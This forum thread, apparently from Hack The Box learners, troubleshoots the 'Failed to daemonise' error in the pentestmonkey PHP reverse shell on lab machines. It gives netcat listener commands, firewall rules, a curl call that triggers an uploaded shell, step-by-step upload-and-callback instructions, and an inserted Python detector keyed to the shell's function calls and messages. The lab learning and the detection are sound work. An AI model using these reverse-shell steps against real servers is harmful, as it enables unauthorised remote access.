php-reverse-shell.php issue

Hi all, I’m trying to run a reverse shell from one of the machines. After uploading php-reverse-shell.php to the target, I’m getting an error message ‘Failed to daemonize’. What do I need to do in order to fix this and gain the reverse shell?

Thanks

Pilgrim23

It’s probably just because it doesn’t find pcntl_fork. Your error message also probably says “this is not fatal” meaning it should work even if it can’t daemonize so your problem is likely elsewhere.

I had this same issue. It means your pc isn’t listening on the port.

You want to issue this command on your machine

nc -lnvp ‘whatever port you set in reverse shell’

e.g. nc -lnvp 1234

Hmm, I typed nc -lvp 1234 and that didn’t work. Configured the reverse shell php script with the correct IP address too (ie the IP of the Kali Linux box).

Hmmm, not too sure then. If the IP and port are correct, pointing back to your HTB VPN IP, it should work.

@Phase said:

I had this same issue. It means your pc isn’t listening on the port.

You want to issue this command on your machine

nc -lnvp ‘whatever port you set in reverse shell’

e.g. nc -lnvp 1234

That’s not what it means. Assuming you’re using the most common script…

// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies.  Worth a try...
if (function_exists('pcntl_fork')) {
	// Fork and have the parent process exit
	$pid = pcntl_fork();
	
	if ($pid == -1) {
		printit("ERROR: Can't fork");
		exit(1);
	}
	
	if ($pid) {
		exit(0);  // Parent exits
	}
	// Make the current process a session leader
	// Will only succeed if we forked
	if (posix_setsid() == -1) {
		printit("Error: Can't setsid()");
		exit(1);
	}
	$daemon = 1;
} else {
	printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}

Additionally from the Pentestmonkey website…

“Isn’t the shell connection just going to be severed when the web server times out the PHP script?
No. It doesn’t seem to on the systems that I’ve tested it on (Gentoo Linux only so far). Additionally the PHP script attempts to daemonise itself and dissociate from the parent process to avoid this (though it rarely works in practise). Your browser will appear to hang when you access the reverse shell. This is normal. It’s OK to hit cancel in your browser once you’ve got your shell.”
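A defender-side triage check built from the indicators visible in this thread (the two calls in the quoted excerpt and the three status messages), added here as an example and not part of any post or of the original script. The names `classify` and `scan_tree`, the verdict labels and the benign sample are assumptions made for illustration.

```python
import re
from pathlib import Path

# Indicators taken only from this thread: the two calls in the quoted excerpt
# and the three status messages seen in the quoted script and curl output.
CALL_RE = re.compile(r"\b(pcntl_fork|posix_setsid)\s*\(")
MESSAGES = (
    "Failed to daemonise",
    "Successfully opened reverse shell",
    "Shell connection terminated",
)

def classify(source: str) -> dict:
    """Score PHP source text against the indicators above (hypothetical helper)."""
    # Only real call sites match: a bare mention in a comment or inside
    # function_exists('...') is not followed by "(" and is ignored.
    calls = sorted(set(CALL_RE.findall(source)))
    messages = [m for m in MESSAGES if m in source]
    if len(calls) == 2 and messages:
        verdict = "likely-reverse-shell"
    elif calls or messages:
        verdict = "review"
    else:
        verdict = "clean"
    return {"calls": calls, "messages": messages, "verdict": verdict}

def scan_tree(root: str) -> dict:
    """Classify every *.php file under root, e.g. a web upload directory."""
    results = {}
    for path in sorted(Path(root).rglob("*.php")):
        text = path.read_text(encoding="utf-8", errors="replace")
        results[str(path.relative_to(root))] = classify(text)["verdict"]
    return results

# Sample inputs: the first is the excerpt quoted in the thread (shortened),
# the second is constructed benign code.
QUOTED_EXCERPT = """<?php
if (function_exists('pcntl_fork')) {
    $pid = pcntl_fork();
    if ($pid) { exit(0); }
    if (posix_setsid() == -1) { exit(1); }
} else {
    printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}
"""
BENIGN = "<?php echo htmlspecialchars($_GET['name'] ?? 'guest');\n"

if __name__ == "__main__":
    print(classify(QUOTED_EXCERPT))
    print(classify(BENIGN))
```

This is a heuristic keyed to unmodified copies of the script; read "clean" as "no indicator matched", not as proof that a file is safe.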

But the shell doesn’t appear.

I have this exact problem; it’s with a retired machine. I even then followed along with the write-up. They were doing exactly what I was doing. Need to fix whatever my problem is, this is very important to me.

Figured out what I was doing: using Kali to serve the PHP page, I was wget’ing only an error message, so that was all I saw. Lol. It was a learning moment.

Late to the party, but I’m running into this exact same issue and unfortunately I don’t think anyone explained how they resolved the issue in the comments above. Would someone care to please help me out?

Was also running into this. Check your firewall settings and make sure your kali box is able to accept the port you are using in the php file.

if using ufw you can run this command:

ufw allow from 10.10.10.28 proto tcp to any port 1234

replace the ip and port based on your use case

@Blackxbeard said:
Was also running into this. Check your firewall settings and make sure your kali box is able to accept the port you are using in the php file.

if using ufw you can run this command:

ufw allow from 10.10.10.28 proto tcp to any port 1234

replace the ip and port based on your use case

Did this (changed “port 1234” to “port 80” since I think that’s the one I need), but alas, no luck.

For reference, here is the error message I get:

curl http://10.10.10.28/uploads/php-reverse-shell.php
WARNING: Failed to daemonise. This is quite common and not fatal.
Successfully opened reverse shell to 10.10.10.28:80
ERROR: Shell connection terminated

Have you tried generating a PHP reverse shell with msfvenom instead? That works too.
Not sure which this box is, but I got the same error when I used pentestmonkey’s reverse shell found in /usr/share/webshells/php/. This was for a Windows box.

WARNING: Failed to daemonise. This is quite common and not fatal.
Successfully opened reverse shell to 10.10.10.28:80
ERROR: Shell connection terminated

@ivanitlearning said:
Have you tried generating a PHP reverse shell with msfvenom instead? That works too.
Not sure which this box is, but I got the same error when I used pentestmonkey’s reverse shell found in /usr/share/webshells/php/. This was for a Windows box.

WARNING: Failed to daemonise. This is quite common and not fatal.
Successfully opened reverse shell to 10.10.10.28:80
ERROR: Shell connection terminated

No luck there either. Every exploit I tried, nothing happened, and then when I exited it would say “exploit successful. No session created.”

Hello Everyone,

I got the same problems. I tried to go through everything and I made it in the end :smiley: , so this will help you troubleshoot the issue and try everything:

  1. Before uploading php-reverse-shell.php to the target, first of all modify the IP address and put the one that was assigned to you through your connection to the Hackthebox network. It starts with 10.10.14. and you can find it using either the “ifconfig” or the “ip a” command. About the port number: you can change the port or leave it as it is, i.e. “1234”, but for best practice let’s change it to “33456” instead.

  2. Now you modified the file, you uploaded it to the web server and you got that message in the web browser that your file is uploaded. CONGRATS!! Here’s the critical part:

  3. First of all run the nc command “nc -lvnp 33456”, and before running it check that the firewall is disabled using the command “ufw status”.

  4. Now you’re listening on port 33456 and you’re waiting for the machine to reverse connect to you. You invoke the event by running the curl command (make sure that your filename is right).

  5. Normally in this case you should see, on the terminal where you executed the “nc” command, that you get a little $ to run your command and that the connection is established.

There’s something I still don’t understand, i.e.: if I stay inactive in the connection I established, the connection on the port closes (which is normal), but when I try to execute the curl command I get a 404, which specifies that the file is removed, so I need to go through the process again and upload the file and… I think that when the php script is terminated it deletes itself automatically, which is a good cybersecurity best practice to not leave a print in the attacked machine.

Best Regards,
Salah,

Check whether you are entering the correct IP address; it must be the tun0 interface. And try listening via nc -lvvp 1234.

@SalahEo said:
There’s something I still don’t understand, i.e.: if I stay inactive in the connection I established, the connection on the port closes (which is normal), but when I try to execute the curl command I get a 404, which specifies that the file is removed, so I need to go through the process again and upload the file and… I think that when the php script is terminated it deletes itself automatically, which is a good cybersecurity best practice to not leave a print in the attacked machine.

Tip for your next machines: when uploading files that keep getting deleted, if you’re using Burp Proxy you can send the upload request from Proxy > HTTP history to Repeater and resend it to upload the same file again without modifying any cookies or data.

Sorry, I never explained the mistake I was making. It is embarrassing, but it may help someone. Keep in mind I was a total noob, I mean my noobness was extreme, not as bad now… But to the problem I was making for myself… How are you getting your shell to your box? Are you serving it? Like does that server speak php? If so you are only going to upload error messages-- not a shell. So turn apache2 off on your haxor box, and use

python3 -m http.server port
sudo python3 -m http.server low port

I hope this helps someone, it was my first real big problem and was very discouraging.
I apologize for stealing that moment when you figured out your problem if that is indeed what just happened.

Just in case anyone else is facing the same problem, point the reverse shell to your HTB IP address located at the tun0 interface and not your WIFI interface.